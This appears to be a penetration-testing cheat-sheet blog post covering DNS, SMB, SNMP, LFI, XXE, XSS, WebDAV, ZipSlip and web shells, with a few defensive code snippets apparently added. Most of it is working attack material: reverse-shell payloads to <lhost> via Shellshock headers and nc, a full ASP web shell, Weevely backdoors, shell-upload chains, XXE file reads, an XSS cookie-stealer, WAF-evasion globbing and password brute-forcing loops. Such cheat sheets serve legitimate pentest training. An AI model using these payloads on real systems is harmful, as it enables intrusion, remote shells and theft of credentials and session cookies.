
Miscellaneous Snippets

Collection of references, commands, scripts, and tool usage examples for various things.

References

ISO
OWASP cheatsheetseries
OWASP Top 10
PTES
SANS
NIST
COBIT
SABSA
TOGAF
ITIL


OSINT

awesome-osint
theHarvester
Shodan
Google Hacking Database
Censys
spiderfoot
gitrob
maltego/casefile
recon-ng
discover.sh


General

Backup Files


bfac

bfac --url http://<rhost>/<target-file>

fuzzx

python fuzzx.py http://<rhost>/<target-file>


Crypto


CyberChef
dCode
esolangs
RsaCtfTool
DTMF decoder

Curl


curl -i <rhost>

curl <rhost>/robots.txt -s | html2text
curl <rhost>/README.md -s | html2text

curl <rhost> -s -L | grep "title\|href" | sed -e 's/^[[:space:]]*//'
curl <rhost> -s -L | grep '<!--.*-->' | sed -e 's/^[[:space:]]*//'
curl <rhost> -s -L |sed -n '/<!--/,/-->/p'


DNS


dig axfr @<rhost> <domain>  
dig @<rhost> -x <rhost>

dig @<rhost> <domain> mx
dig @<rhost> <domain> ns

dig @<rhost> <domain> ALL
dig axfr <domain> @<rhost>
dig txt _dmarc.<domain>

host -l <domain> <rhost>

nslookup 
> set querytype=any
> <domain>

nslookup -type=txt <domain>

nmap --script dns-srv-enum --script-args dns-srv-enum.domain=<domain>

dnsenum <domain> 
dnsenum -p 5 -s 20 <domain> 
dnsenum -f subdomainslist.txt <domain>
dnsenum --enum <domain>

dnsrecon -d <domain> -t axfr 
dnsrecon -d <domain> -D /usr/share/wordlists/dnsmap.txt -t std --xml output.xml   // brute
dnsrecon -t std -d <domain>

dnstracer -r 3 -v example.com 

dmitry -wins output.txt <domain> 


Common Record Types


Record   Description
A        Host address
AAAA     IPv6 host address
ALIAS    Auto resolved alias
CNAME    Canonical name for an alias
MX       Mail eXchange
NS       Name Server
PTR      Pointer
SOA      Start Of Authority
SRV      Location of service
TXT      Descriptive text


DNSSEC Record Types


Record       Description
DNSKEY       DNSSEC public key
DS           Delegation Signer
NSEC         Next Secure
NSEC3        Next Secure v. 3
NSEC3PARAM   NSEC3 Parameters
RRSIG        RRset Signature


Less common Record Types


Record              Description
AFSDB               AFS Data Base location
ATMA                Asynchronous Transfer Mode address
CAA                 Certification Authority Authorization
CERT                Certificate / CRL
DHCID               DHCP Information
DNAME               Non-Terminal DNS Name Redirection
HINFO               Host information
ISDN                ISDN address
LOC                 Location information
MB, MG, MINFO, MR   Mailbox records
NAPTR               Naming Authority Pointer
NSAP                NSAP address
RP                  Responsible person
RT                  Route through
TLSA                Transport Layer Security Authentication
X25                 X.25 PSDN address

For a more detailed explanation of each type of record, shout out to dns-record-types by Simple DNS.


SubDomains


So many quality subdomain enumeration tools now:
amass
findomain
all.txt

wfuzz -w /root/SecLists/Discovery/DNS/subdomains-top1mil-5000.txt -u domain.htb -H "Host:FUZZ.domain.htb"   // HTB 


.DS_Store


ds_store_exp
ds_storescanner

python ds_store_exp.py http://<rhost>/.DS_Store


Emails


scrapemail

python scrapemail.py -url http://<rhost>/
python scrapemail.py -ulist <url-file>


Evil-WinRAR


Evil-WinRAR-Gen

msfvenom -p windows/meterpreter/reverse_tcp LHOST=<lhost> LPORT=<lport> -f exe > shell.exe

touch winrar.txt
./evilWinRAR.py -e shell.exe -g winrar.txt


Finger


finger-user-enum.pl

finger <user>@<rhost>

./finger-user-enum.pl -U <username-list> -t <rhost>


Gobuster Wordlists


/usr/share/wordlists/dirb/common.txt
/usr/share/wordlists/dirb/big.txt
/usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt 
/usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt 
/root/SecLists/Discovery/Web-Content/common.txt 
/root/SecLists/Discovery/Web-Content/RobotsDisallowed-Top1000.txt
/root/SecLists/Discovery/Web-Content/CGIs.txt
/root/SecLists/Discovery/Web-Content/Logins.fuzz.txt
/root/SecLists/Discovery/Web-Content/raft*


HTTP Request Methods


Method    Description
GET       The GET method requests a representation of the specified resource. Requests using GET should only retrieve data.
HEAD      The HEAD method asks for a response identical to that of a GET request, but without the response body.
POST      The POST method is used to submit an entity to the specified resource, often causing a change in state or side effects on the server.
PUT       The PUT method replaces all current representations of the target resource with the request payload.
DELETE    The DELETE method deletes the specified resource.
CONNECT   The CONNECT method establishes a tunnel to the server identified by the target resource.
OPTIONS   The OPTIONS method is used to describe the communication options for the target resource.
TRACE     The TRACE method performs a message loop-back test along the path to the target resource.
PATCH     The PATCH method is used to apply partial modifications to a resource.


HTTPS / SSL


testssl.sh

nmap -sV -Pn -vv -p 443 --script=ssl-ccs-injection,ssl-cert-intaddr,ssl-cert,ssl-date,ssl-dh-params,ssl-enum-ciphers,ssl-heartbleed,ssl-known-key,ssl-poodle,sslv2-drown,sslv2 <rhost>

sslyze --regular <rhost>

./testssl.sh <rhost>
./testssl.sh -e -E -f -p -y -Y -S -P -c -H -U <rhost>

python heartbleed.py <rhost>   


IIS Shortname


IIS_shortname_Scanner

python iis_shortname_Scan.py http://<rhost>/dir/


Java Deserialization


ysoserial

java -jar ysoserial.jar <payload> <command>


JSON Attacks


Attacking JSON Application - websecgeeks
JSON Deserialization Attacks
Munoz-Friday-The-13th-Json-Attacks
Munoz-Friday-The-13th-Json-Attacks 2


Json.Net Deserialization


ysoserial.net

ysoserial.exe -f <formatter> -g <gadget> -o <output> -c <command>
ysoserial.exe -f Json.Net -g ObjectDataProvider -o raw -c "certutil.exe -urlcache..."

{
    '$type':'System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35',
    'MethodName':'Start',
    'MethodParameters':{
        '$type':'System.Collections.ArrayList, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089',
        '$values':['cmd','/c certutil.exe -urlcache...']
    },
    'ObjectInstance':{'$type':'System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089'}
}


JSON Web Tokens


JWT.IO allows you to decode, verify and generate JWT.

JWT.io


LFI


sensitve-files

python lfigen.py /etc/passwd

import sys

if len(sys.argv) != 2:
    print("usage: lfigen.py <file>")
    sys.exit(1)

f = sys.argv[1]

# Plain "../" traversal at depth 0-9: bare, then with a trailing null byte,
# then with a trailing query marker appended after the target file.
for suffix in ("", "%00", "?"):
    for depth in range(10):
        print(("../" * depth).rstrip("/") + f + suffix)

# Doubled ("....//"), backslash-encoded ("/%5C..") and percent-encoded
# ("%2e%2e") traversal units at depth 1-10.
for unit in ("....//", "/%5C../", "%2e%2e/"):
    for depth in range(1, 11):
        print((unit * depth)[:-1] + f)
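As an added defensive counterpart to the generator above (example code, not part of the original page), the following shows why a filter that strips "../" is beaten by the "....//" family while a normalising check handles every encoding the script emits. BASE is a constructed document root.

```python
import posixpath
from urllib.parse import unquote

BASE = "/var/www/files"   # constructed document root for this example


def naive_strip(path):
    """The filter the '....//' family is built to defeat: delete every
    '../' once and trust whatever is left."""
    return path.replace("../", "")


def canonical(path):
    """Reduce a user-supplied path to what the filesystem would see:
    percent-decode until stable (covers %2e%2e and double encoding), treat
    backslashes (%5C) as separators and cut at a NUL byte (%00)."""
    prev = None
    while prev != path:
        prev, path = path, unquote(path)
    path = path.replace("\\", "/")
    return path.split("\x00", 1)[0]


def resolve_in_base(user_path, base=BASE):
    """Return the absolute path if it stays under base, otherwise None.
    Traversal is judged after normalisation rather than by pattern
    matching, so the encoding used does not matter. Note that '....//'
    is not traversal to a normaliser: '....' is an ordinary (and almost
    certainly nonexistent) directory name, which is why that trick only
    works against strip-once filters."""
    rel = canonical(user_path).lstrip("/")
    full = posixpath.normpath(posixpath.join(base, rel))
    if full == base or full.startswith(base + "/"):
        return full
    return None


def audit(payloads, base=BASE):
    """Map each candidate path to where it would resolve, or None if rejected."""
    return {p: resolve_in_base(p, base) for p in payloads}
```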


Magic Bytes


Magic Bytes - List of file signatures

Executable Binaries   Mnemonic          Signature
DOS Executable        “MZ”              4D 5A
ELF Executable        “.ELF”            7F 45 4C 46

Image File Formats    Mnemonic          Signature
PNG Image             “.PNG….”          89 50 4E 47 0D 0A 1A 0A
GIF Image             “GIF87a”          47 49 46 38 37 61
                      “GIF89a”          47 49 46 38 39 61
JPEG Image            “ÿØÿÛ”            FF D8 FF DB
                      “ÿØÿà..JFIF..”    FF D8 FF E0 00 10 4A 46 49 46 00 01
                      “ÿØÿî”            FF D8 FF EE
                      “ÿØÿá..Exif..”    FF D8 FF E1 ?? ?? 45 78 69 66 00 00
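Added example (not from the original page): a small identifier built from the signatures in the table above, including the "??" wildcard bytes of the Exif form, plus the upload check a defender actually wants, namely that the bytes agree with the claimed extension. The EXPECTED_TYPE mapping is an assumption for the example.

```python
import os

# Signatures from the table above; "??" marks a wildcard byte.
SIGNATURES = [
    ("DOS Executable", "4D 5A"),
    ("ELF Executable", "7F 45 4C 46"),
    ("PNG Image",      "89 50 4E 47 0D 0A 1A 0A"),
    ("GIF Image",      "47 49 46 38 37 61"),
    ("GIF Image",      "47 49 46 38 39 61"),
    ("JPEG Image",     "FF D8 FF DB"),
    ("JPEG Image",     "FF D8 FF E0 00 10 4A 46 49 46 00 01"),
    ("JPEG Image",     "FF D8 FF EE"),
    ("JPEG Image",     "FF D8 FF E1 ?? ?? 45 78 69 66 00 00"),
]

# Assumed policy: which detected type an upload with this extension may carry.
EXPECTED_TYPE = {
    ".exe": "DOS Executable",
    ".png": "PNG Image",
    ".gif": "GIF Image",
    ".jpg": "JPEG Image",
    ".jpeg": "JPEG Image",
}


def parse_signature(spec):
    """'FF D8 ?? 45' -> [0xFF, 0xD8, None, 0x45]; None is a wildcard."""
    return [None if tok == "??" else int(tok, 16) for tok in spec.split()]


def matches(header, pattern):
    """True when the header starts with the pattern, wildcards allowed."""
    if len(header) < len(pattern):
        return False
    return all(p is None or b == p for b, p in zip(header, pattern))


def identify(data):
    """Name the file type from its leading bytes. Longest signatures are
    tried first so the 12-byte JFIF/Exif forms are checked before the
    4-byte JPEG variants."""
    table = sorted(SIGNATURES, key=lambda s: -len(parse_signature(s[1])))
    for name, spec in table:
        if matches(data, parse_signature(spec)):
            return name
    return None


def upload_matches_extension(filename, data):
    """Upload validation: the content must identify as the type the
    extension claims. Unknown content and renamed executables both fail."""
    ext = os.path.splitext(filename)[1].lower()
    detected = identify(data)
    return detected is not None and EXPECTED_TYPE.get(ext) == detected
```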


Mail


smtp-user-enum -M VRFY -U <userlist> -t <rhost>
smtp-user-enum -M EXPN -U <userlist> -t <rhost>
#!/usr/bin/python3
import socket
import sys

if len(sys.argv) != 2:
    print("usage: vrfy.py <username>")
    sys.exit(0)

# Connect to the SMTP service and read the greeting banner.
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(('<rhost>', 25))
banner = s.recv(1024)
print(banner.decode(errors='replace'))

# Ask the server whether the mailbox exists and print its reply.
s.send(('VRFY ' + sys.argv[1] + '\r\n').encode())
result = s.recv(1024)
print(result.decode(errors='replace'))
s.close()


POP3

Command         Comment
USER            Your user name for this mail server
PASS            Your password.
QUIT            End your session.
STAT            Number and total size of all messages
LIST            Message# and size of message
RETR message#   Retrieve selected message
DELE message#   Delete selected message
NOOP            No-op. Keeps your connection open.
RSET            Reset the mailbox. Undelete deleted messages.


SMTP

Command     Comment
HELO        It's the first SMTP command: it starts the conversation identifying the sender server and is generally followed by its domain name.
EHLO        An alternative command to start the conversation, underlining that the server is using the Extended SMTP protocol.
MAIL FROM   With this SMTP command the operations begin: the sender states the source email address in the "From" field and actually starts the email transfer.
RCPT TO     It identifies the recipient of the email; if there is more than one, the command is simply repeated address by address.
SIZE        This SMTP command informs the remote server about the estimated size (in terms of bytes) of the attached email. It can also be used to report the maximum size of a message to be accepted by the server.
DATA        With the DATA command the email content begins to be transferred; it's generally followed by a 354 reply code given by the server, giving the permission to start the actual transmission.
VRFY        The server is asked to verify whether a particular email address or username actually exists.
TURN        This command is used to invert roles between the client and the server, without the need to run a new connection.
AUTH        With the AUTH command, the client authenticates itself to the server, giving its username and password. It's another layer of security to guarantee a proper transmission.
RSET        It tells the server that the ongoing email transmission is going to be terminated, though the SMTP conversation won't be closed (as it is with QUIT).
EXPN        This SMTP command asks for a confirmation about the identification of a mailing list.
HELP        It's a client's request for some information that can be useful for a successful transfer of the email.
QUIT        It terminates the SMTP conversation.
MAIL        Defines source email address
BDAT        Signifies that binary data will follow


Networking


Windows

1) Windows + R

2) ncpa.cpl    // run

3) Right click Ethernet -> Properties 

4) Select Internet Protocol Version 4 (TCP/IPv4) -> Properties 

5) Enter IP and DNS server:

	Use the following IP address: <...>

	Use the following DNS server addresses: <...>

Linux

ipcalc xx.xx.xx.xx

ifconfig <iface> xx.xx.xx.xx
ifconfig <iface> xx.xx.xx.xx/24   
ifconfig <iface> xx.xx.xx.xx netmask 255.xx.xx.xx 

echo nameserver xx.xx.xx.xx > /etc/resolv.conf


NFS


showmount -e <rhost>

mkdir /tmp/mnt
mount <rhost>:/<rdir> /tmp/mnt

mount -t nfs <rhost>:/<rdir> /tmp/mnt -nolock


Nmap


nmap -sT -p- --min-rate 5000 --max-retries 2 <rhost>
nmap -sC -sV -T4 <rhost>

ports=$(nmap -p- --min-rate=1000 -T4 <rhost> | grep ^[0-9] | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//)
nmap -p$ports -sC -sV <rhost>


Oracle


odat.py

oscanner -s <rhost> -P <rport>

./odat.py sidguesser -s <rhost>

use auxiliary/admin/oracle/sid_brute  
use auxiliary/admin/oracle/sid_enum  

tnscmd10g version -h <rhost>


Padbusting


PadBuster

padbuster http://<rhost>/login.php <cookievalue> 8 --cookies <param>=<cookievalue> --encoding 0
padbuster http://<rhost>/login.php <cookievalue> 8 --cookies <param>=<cookievalue> --encoding 0 -plaintext  '<p>=<v>' 


RDP


pth-remote-desktop

apt-get update
apt-get install freerdp-x11

xfreerdp /u:<username> /pth:<hash> /v:<rhost>
xfreerdp -u <username> -p <password> <rhost>


reGeorg


reGeorg

1) Upload tunnel.(aspx|ashx|jsp|php) to a webserver 

2) Configure your tools to use a socks proxy, using the ip address and port you specified when you started reGeorgSocksProxy.py 

python reGeorgSocksProxy.py -p <port> -u http://<rhost>/<uploaded-tunnel>
proxychains <command>


RPC


rpcclient <rhost> -U "" -N
rpcinfo -p <rhost>
rpcdump <rhost>  -v


Rsync


rsync-man-pages
pentesting-rsync

rsync --list-only -a rsync://<rhost>:<port> 
rsync -avz rsync://<rhost>:<port>/etc /root/download/etc

/etc/rsync.conf 

for word in $(cat /root/SecLists/Passwords/Leaked-Databases/rockyou-10.txt ); do sshpass -p $word rsync -6 -r rsync://<user>@<rhost>:<port>/module/ .; done 

rsync -av rsync://<user>@<rhost>/<module> <module> --port <port> --password-file=/root/rockyou.txt


Shellshock


shocker

python shocker.py -H <rhost> --command "/bin/cat /etc/passwd" -c /cgi-bin/shellshock.sh --verbose 
python shocker.py -H <rhost> --command "/bin/bash -i > /dev/tcp/<lhost>/<lport> 0<&1 2>&1" -c /cgi-bin/shellshock.sh 

User-Agent: () { :; }; bash -i >& /dev/tcp/<lhost>/<lport> 0>&1
User-Agent: () { :; }; /usr/bin/nc <lhost> <lport> -e /bin/sh


SMB


Impacket
stealing hashes
capture ntlm hashes
smb-share-scf-file-attacks

enum4linux -a <rhost>

nbtscan <rhost>
nmblookup -A <rhost>
nbtstat -a <rhost>

samrdump.py <rhost>

smbmap -H <rhost> -u anonymous
nullinux -all <rhost>

smbclient //<rhost>/<share> -U " "%" "


auxiliary/admin/smb/samba_symlink_traversal
smb> symlink / rootfs
smb> cd rootfs
smb> symlink ../../../../../../../../../../foobar
smb> cd foobar  


responder -I <interface>

// save and upload as @hash.scf
[Shell]
Command=2
IconFile=\\<lhost>\share\hash.ico
[Taskbar]
Command=ToggleDesktop


SNMP


snmpenum.pl

nmap -sV -Pn -vv -p 161 --script=snmp-info,snmp-win32-users,snmp-processes,snmp-win32-services,snmp-win32-software,snmp-win32-shares <rhost> 

auxiliary/scanner/snmp/snmp_enumusers

snmpwalk -c <community> -v1 <rhost> 1
snmpcheck -t <rhost> -c <community>
snmpenum -t <rhost>
onesixtyone -c <community> -i <rhost>

./snmpenum.pl <rhost> public linux.txt
./snmpenum.pl <rhost> public windows.txt

Enumerate MIB:
****************************************
1.3.6.1.2.1.25.1.6.0    System Processes
1.3.6.1.2.1.25.4.2.1.2  Running Programs
1.3.6.1.2.1.25.4.2.1.4  Processes Path
1.3.6.1.2.1.25.2.3.1.4  Storage Units
1.3.6.1.2.1.25.6.3.1.2  Software Name
1.3.6.1.4.1.77.1.2.25   User Accounts
1.3.6.1.2.1.6.13.1.3    TCP Local Ports
****************************************

snmpwalk -c <community> -v1 <rhost> <MIB>


Stego


stego-toolkit
StegCracker

strings <file>

binwalk <file>
binwalk -e <file>

exiftool <file>
exiv2 <file>

foremost -i <file>

steghide info <file>
steghide extract -sf <file>

pngcheck <file>

zsteg -a <file>
zsteg -E <file>


WAF - Globbing


WAF evasion 1
WAF evasion 2
WAF evasion 3

Standard: 		/bin/nc myip 1337 
Evasion:			/???/n? 2130706433 1337 
Used chars: 		/ ? n [0-9]

Standard: 		/bin/cat /etc/passwd
Evasion: 			/???/??t /???/??ss??
Used chars: 		/ ? t s


Web Dav


davtest -url http://<rhost>/
davtest -url http://<rhost>/<dir>


1)
--------------------------------------------------------------------------------------------
msfvenom -p php/meterpreter/reverse_tcp lhost=<lhost> lport=<lport> -f raw > shell.php

curl http://<rhost>/dav/ --upload-file /root/shell.php

./handler.sh windows/meterpreter/reverse_tcp <lhost> <lport>
curl http://<rhost>/dav/shell.php


2)
--------------------------------------------------------------------------------------------
msfvenom -p php/meterpreter/reverse_tcp lhost=<lhost> lport=<lport> -f raw > shell.php

cadaver http://<rhost>/dav 
dav:/>put shell.php
dav:/>exit

./handler.sh windows/meterpreter/reverse_tcp <lhost> <lport>
curl http://<rhost>/dav/shell.php


3)
--------------------------------------------------------------------------------------------
msfvenom -p windows/meterpreter/reverse_tcp LHOST=1.2.3.4 LPORT=443 -f asp > aspshell.txt

cadaver http://<rhost>/dav
dav:/>put /root/aspshell.txt
dav:/>copy aspshell.txt aspshellnew.asp;.txt
dav:/>exit

./handler.sh windows/meterpreter/reverse_tcp <lhost> <lport>
curl http://<rhost>/dav/aspshellnew.asp;.txt  


Webmin


ExploitDB-2017

perl webmin.pl <rhost> 10000 <target-file>
auxiliary/admin/webmin/file_disclosure

curl http://<rhost>:10000//unauthenticated/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/etc/passwd 


Web Shells


WhiteWinterWolf
phpbash
p0wny-shell

root@kali:/usr/share/webshells# tree
.
├── asp
│   ├── cmd-asp-5.1.asp
│   └── cmdasp.asp
├── aspx
│   └── cmdasp.aspx
├── cfm
│   └── cfexec.cfm
├── jsp
│   ├── cmdjsp.jsp
│   └── jsp-reverse.jsp
├── perl
│   ├── perlcmd.cgi
│   └── perl-reverse-shell.pl
└── php
    ├── findsock.c
    ├── php-backdoor.php
    ├── php-findsock-shell.php
    ├── php-reverse-shell.php
    ├── qsd-php-backdoor.php
    └── simple-backdoor.php

ASPX

<?xml version="1.0" encoding="UTF-8"?>
<configuration>
   <system.webServer>
      <handlers accessPolicy="Read, Script, Write">
         <add name="web_config" path="*.config" verb="*" modules="IsapiModule" scriptProcessor="%windir%\system32\inetsrv\asp.dll" resourceType="Unspecified" requireAccess="Write" preCondition="bitness64" />         
      </handlers>
      <security>
         <requestFiltering>
            <fileExtensions>
               <remove fileExtension=".config" />
            </fileExtensions>
            <hiddenSegments>
               <remove segment="web.config" />
            </hiddenSegments>
         </requestFiltering>
      </security>
   </system.webServer>
</configuration>
<%
Set oScript = Server.CreateObject("WSCRIPT.SHELL")
Set oScriptNet = Server.CreateObject("WSCRIPT.NETWORK")
Set oFileSys = Server.CreateObject("Scripting.FileSystemObject")

Function getCommandOutput(theCommand)

    Dim objShell, objCmdExec
    Set objShell = CreateObject("WScript.Shell")
    Set objCmdExec = objshell.exec(thecommand)
    getCommandOutput = objCmdExec.StdOut.ReadAll

end Function

%>


<HTML>
<BODY>
<FORM action="" method="GET">
<input type="text" name="cmd" size=45 value="<%= szCMD %>">
<input type="submit" value="Run">
</FORM>
<PRE>
<%= "\\" & oScriptNet.ComputerName & "\" & oScriptNet.UserName %>
<%Response.Write(Request.ServerVariables("server_name"))%>
<p>
<b>The server's port:</b>
<%Response.Write(Request.ServerVariables("server_port"))%>
</p>
<p>
<b>The server's software:</b>
<%Response.Write(Request.ServerVariables("server_software"))%>
</p>
<p>
<b>The server's local address:</b>
<%Response.Write(Request.ServerVariables("LOCAL_ADDR"))%>
<% szCMD = request("cmd")
thisDir = getCommandOutput("cmd /c" & szCMD)
Response.Write(thisDir)%>
</p>
<br>
</BODY>
</HTML>
<%response.write CreateObject("WScript.Shell").Exec(Request.QueryString("cmd")).StdOut.Readall()%>

Weevely

weevely generate Sh3ll            // generate password 'Sh3ll' protected PHP backdoor
weevely http://<rhost>/path/to/upload/shell.php Sh3ll  // trigger shell
...
weevely> id
uid=33(www-data) gid=33(www-data) groups=33(www-data)


Wordlists / Creation


SecLists
Leaked-Databases
rockyou.txt

cewl <url> -w outfilewordlist.txt
cewl <url> -m 6 -w outfileworlist.txt

python cupp.py -pw profiler   

twofi -m 6 -u @target > wordlist_target.txt  

Wordhound 
Brutescrape  
crunch


XXE


XXE Injection

<?xml version="1.0"?><!DOCTYPE root [<!ENTITY test SYSTEM 'file:///etc/passwd'>]><root>&test;</root>
<?xml version="1.0" encoding="ISO-8859-1"?>
    <!DOCTYPE foo [
    <!ELEMENT foo ANY >
    <!ENTITY xxe SYSTEM "file:///etc/passwd" >]>
    <Content>    
	<Author>&xxe;</Author>
	<Subject>exploit</Subject>
     </Content>
<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE hack [<!ENTITY xxe SYSTEM "http://<lhost>/shell.php" >]>
<foo>&xxe;</foo>
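Added example (not from the original page): the parser-side mitigation for the three payloads above, using only the standard library's expat bindings. Every entity declaration aborts the parse before the entity can be referenced, so the file:// and http:// lookups in the payloads never happen; the payload strings are embedded for the self-test.

```python
import xml.parsers.expat


class EntityDeclarationError(ValueError):
    """Raised the moment the document declares an entity of any kind."""


def parse_without_entities(xml_text):
    """Parse with the stdlib expat parser and return the element names in
    document order. Any <!ENTITY ...> declaration (internal, external
    SYSTEM/PUBLIC, or parameter entity) raises before it can be used."""
    parser = xml.parsers.expat.ParserCreate()
    names = []

    def on_entity_decl(name, is_param, value, base, system_id, public_id, notation):
        raise EntityDeclarationError(
            "entity %r declared (SYSTEM=%r); document rejected" % (name, system_id))

    def on_start(tag, attrs):
        names.append(tag)

    parser.EntityDeclHandler = on_entity_decl
    parser.StartElementHandler = on_start
    # Belt and braces: even if a declaration slipped through, refuse to
    # fetch external entities (returning 0 makes expat report an error).
    parser.ExternalEntityRefHandler = lambda *args: 0
    parser.Parse(xml_text, True)
    return names


def is_safe_document(xml_text):
    """True when the document parses with no entity declarations at all."""
    try:
        parse_without_entities(xml_text)
        return True
    except (EntityDeclarationError, xml.parsers.expat.ExpatError):
        return False


# The three payloads from this section, embedded for the self-test.
XXE_PAYLOADS = [
    "<?xml version=\"1.0\"?><!DOCTYPE root [<!ENTITY test SYSTEM 'file:///etc/passwd'>]>"
    "<root>&test;</root>",
    '<?xml version="1.0" encoding="ISO-8859-1"?>\n<!DOCTYPE foo [\n<!ELEMENT foo ANY >\n'
    '<!ENTITY xxe SYSTEM "file:///etc/passwd" >]>\n<Content><Author>&xxe;</Author>'
    '<Subject>exploit</Subject></Content>',
    '<?xml version="1.0" encoding="UTF-8" ?>\n<!DOCTYPE hack [<!ENTITY xxe SYSTEM '
    '"http://<lhost>/shell.php" >]>\n<foo>&xxe;</foo>',
]
```

The widely used defusedxml package applies the same handler-based approach to all of the stdlib XML parsers.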


XSS


Advanced XSS

<script>alert("XSS")</script>

<iframe SRC="http://<lhost>/report" height = "0" width ="0"></iframe>

<script> new Image().src="http://<lhost>/bogus.php?output="+document.cookie; </script>


ZipSlip


ZipSlip
evilarc

msfvenom -p php/meterpreter/reverse_tcp LHOST=<lhost> LPORT=<lport> > shell.php

python evilarc.py -f shell.zip -o unix -p "../../../../../../var/www/html" shell.php

./handler.sh php/meterpreter/reverse_tcp <lhost> <lport>

→ Upload shell.zip
→ Trigger meterpreter shell by browsing to it
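Added example (not from the original page or from evilarc): the extraction-side check that stops an archive like the one built above. The archive is constructed in memory with the same traversal entry name, and its content is an inert placeholder; the destination directory is an assumption.

```python
import io
import os
import zipfile


def unsafe_members(zf, dest):
    """Return the entry names whose extraction path would land outside dest.
    Both sides are fully resolved, so '../' sequences, absolute names,
    backslash separators and a symlinked destination are all covered."""
    root = os.path.realpath(dest)
    bad = []
    for name in zf.namelist():
        target = os.path.realpath(os.path.join(root, name.replace("\\", "/")))
        if os.path.commonpath([root, target]) != root:
            bad.append(name)
    return bad


def extract_if_safe(zf, dest):
    """Extract only when every entry stays under dest; otherwise return the
    offending names and touch nothing, which is also the point to alert on.
    (Python's own extractall already strips such components; the explicit
    check is what a hand-rolled extractor needs, and it lets you reject the
    archive instead of silently renaming its members.)"""
    bad = unsafe_members(zf, dest)
    if not bad:
        zf.extractall(dest)
    return bad


def build_archive(entries):
    """Build an in-memory zip from {name: content}; constructed test data."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as out:
        for name, content in entries.items():
            out.writestr(name, content)
    buf.seek(0)
    return zipfile.ZipFile(buf)


# Constructed stand-in for the archive the evilarc command above produces:
# the member name carries the traversal, the body is an inert placeholder.
EVIL_NAME = "../../../../../../var/www/html/shell.php"
EVIL_ARCHIVE = build_archive({EVIL_NAME: "placeholder text, not a web shell",
                              "notes.txt": "harmless"})
```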
This post is licensed under CC BY 4.0 by the author.